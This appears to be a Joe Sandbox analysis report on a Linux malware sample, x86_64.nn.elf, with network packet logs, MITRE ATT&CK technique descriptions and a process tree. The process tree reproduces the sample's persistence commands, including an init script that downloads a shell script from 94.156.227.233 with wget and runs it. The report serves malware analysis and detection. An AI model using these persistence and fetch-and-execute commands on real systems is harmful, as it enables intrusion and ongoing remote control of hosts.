Dec 24, 2024 11:39:59.804354906 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:39:59.923877954 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 11:40:00.310796022 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:40:00.473114014 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 11:40:00.929946899 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 11:40:00.930255890 CET	60160	38242	192.168.2.23	94.156.227.234

System Behavior

Analysis Process: dash PID: 6223, Parent PID: 4331

General

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	/tmp/x86_64.nn.elf
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh /etc/rc.d/S99sh
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	2625d466242beff54d4aaa9db383064a

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	10:37:54
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	10:37:55
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_64.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 6223, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6223, Parent PID: 4331

General

Chronological Activities

Analysis Process: dash PID: 6224, Parent PID: 4331

General

Chronological Activities

Analysis Process: rm PID: 6224, Parent PID: 4331

General

Linux Analysis Report
x86_64.nn.elf